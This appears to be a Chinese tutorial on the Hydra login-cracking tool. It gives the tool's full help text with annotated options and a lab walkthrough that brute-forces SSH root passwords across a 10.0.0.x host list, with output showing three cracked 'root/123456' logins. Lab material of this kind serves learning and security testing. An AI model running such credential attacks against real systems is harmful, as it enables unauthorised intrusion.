hydra 帮助 hydra -h 返回结果: Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -I ignore an existing restore file (don't wait 10 seconds) -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help -y disable use of symbols in bruteforce, see above -e nsr try "n" null password, "s" login as pass and/or "r" reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to attack, one entry per line, ':' to specify port -o FILE write found login/password pairs to FILE instead of stdout -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel per target (default: 16) -T TASKS run TASKS connects in parallel overall (for -M, default: 64) -w / -W TIME wait time for a response (32) / between connects per thread (0) -c TIME wait time per login attempt over all threads (enforces -t 1) -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M) -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -O use old SSL v2 and v3 -q do not print messages about connection errors -U service module usage details -h more command line options (COMPLETE HELP) server the target: DNS, IP or (this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra Don't use in military or secret service organizations, or for illegal purposes. These services were not compiled in: afp ncp oracle sapr3. Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup. E.g. % export HYDRA_PROXY=socks5://l:p@ (or: socks4:// connect://) % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries) % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080 % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries) Examples: hydra -l user -P passlist.txt 解释: -l 指定的用户名称 -P 指定密码文件,也就是字典文件 hydra -L userlist.txt -p defaultpw imap:// hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 解释: -C hydra -l admin -p password ftp://[]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh 解释: -L 指定用户名文件,用户名列表文件 -P 指定密码文件,也就是字典文件 -M 主机的IP地址列表文件 ssh 要破解的服务,这里破解的服务是ssh 解释: -L 制定用户名文件,指定用户名列表文件 -l 指定用户名,用户名称 -P(大P) 指定密码文件,字典 -C 指定用户名文件 -p(小p) 指定密码,单个密码 -M 指定主机列表文件,也就是主机的IP地址 -e nsr 空密码 -o 把输出结果写入到指定的文件中 实验1破解10.0.0.30-段的ssh服务 1.手动生成密码文件 vim pass.txt 输入以下内容根据自己的密码输入 asdf asdfqwe qwerasd asdfghjkl zxcvbnm admin123 asdf123 admin123567890 1234567890 12345 123456 1234 2.生成主机IP段文件 vim hostlist.txt 3.开始暴力破解 hydra -l root -P pass.txt -M hostlist.txt ssh 返回结果: Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-05 19:18:46 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 13 tasks per 12 servers, overall 64 tasks, 13 login tries (l:1/p:13), ~3 tries per task [DATA] attacking ssh://(12 targets):22/ [ERROR] could not resolve address: [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh:// - No route to host [ERROR] could not connect to ssh://(null):22 - Hostname required [22][ssh] host: login: root password: 123456 [22][ssh] host: login: root password: 123456 [22][ssh] host: login: root password: 123456 3 of 12 targets successfully completed, 3 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-05 19:19:14 这里可以看到32.31.30主机的密码是123456用户名是root 4.或者制定ip地址 hydra -l root -P pass.txt ssh